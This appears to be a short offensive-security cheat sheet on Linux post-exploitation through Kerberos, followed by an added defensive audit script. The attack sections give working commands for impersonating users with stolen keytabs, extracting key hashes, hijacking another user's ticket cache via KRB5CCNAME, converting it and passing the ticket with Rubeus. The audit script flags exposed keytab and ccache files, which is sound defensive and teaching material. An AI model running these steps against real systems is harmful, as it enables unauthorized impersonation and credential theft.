# Linux Post-Exploitation

## Abusing Keytab

### Impersonate user
```bash
klist -k -t   # list the entries (KVNO, timestamp, principal) in the default keytab
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab   # obtain a TGT as carni7 using his keytab
```
### KeyTabExtract

KeyTabExtract is a tool that extracts the Kerberos hashes (key material) stored in a keytab file.
```bash
python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab
```
## Abusing ccache

Using another user's ccache file requires root privileges, because the cache is owned by that user with restrictive permissions.
### Checking group privileges

```bash
id venator177@amogus.kek
```
Once a valid, non-expired Kerberos ticket cache has been located, it can be imported into the current session by pointing the `KRB5CCNAME` environment variable at it and then checking the tickets with `klist`.
```bash
cp /tmp/krb5cc_768304578_BRB541 .   # working directory here is /root
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
```

Expected output:

```
Ticket cache: FILE:/root/krb5cc_768304578_BRB541
```
If `klist` reports the copied file as its ticket cache, Kerberos is now using that ticket for the session.
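Both of the sections above depend on a keytab or ccache file being readable by someone other than its owner. As a defender-side counterpart, here is an added shell check, not part of the original page, that lists files matching the name patterns seen above (`*.keytab`, `krb5cc*`) below the given directories and flags any whose mode grants read access to group or others. The directories passed on the command line and the sample files used to exercise it are assumptions constructed for this example.

```shell
#!/bin/sh
# Added audit helper (not from the original page). Lists files named
# *.keytab or krb5cc* below the given directories and flags those whose
# mode grants read access to group or others: a keytab or ccache readable
# by other users lets them act as the principal it holds.
# Usage: audit_krb_files /etc /tmp /var/lib   (directories are assumed)
audit_krb_files() {
    [ "$#" -gt 0 ] || { echo "usage: audit_krb_files DIR..." >&2; return 2; }
    find "$@" -type f \( -name '*.keytab' -o -name 'krb5cc*' \) 2>/dev/null |
    while IFS= read -r f; do
        # first 10 characters of ls -l are the file type and permission bits
        perms=$(ls -ld "$f" | cut -c1-10)
        owner=$(ls -ld "$f" | awk '{print $3}')
        # characters 5-10 are the group and other bits; any 'r' there is exposure
        case "$(printf '%s' "$perms" | cut -c5-10)" in
            *r*) printf 'EXPOSED %s %s %s\n' "$perms" "$owner" "$f" ;;
            *)   printf 'ok      %s %s %s\n' "$perms" "$owner" "$f" ;;
        esac
    done
}

# Returns 0 when no exposed file was found, 1 otherwise (handy for cron or CI).
krb_files_clean() {
    if audit_krb_files "$@" | grep -q '^EXPOSED'; then
        return 1
    fi
    return 0
}
```

Run `audit_krb_files /etc /tmp /var/lib` on a host to get one line per file; anything marked `EXPOSED` should be tightened to mode 0600 (or 0640 with a trusted group) and its keys rotated if the exposure may already have been used. The check uses only `find`, `ls`, `cut` and `awk`, so it runs on a minimal POSIX system without GNU-specific `find -perm /mode` syntax.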
### Ticket Converter

```bash
impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbi   # convert the ccache file to .kirbi format
```
### Importing Kerberos Ticket

```powershell
C:\Rubeus.exe ptt /ticket:c:\carni7.kirbi   # on a Windows host: import the .kirbi into the current logon session
```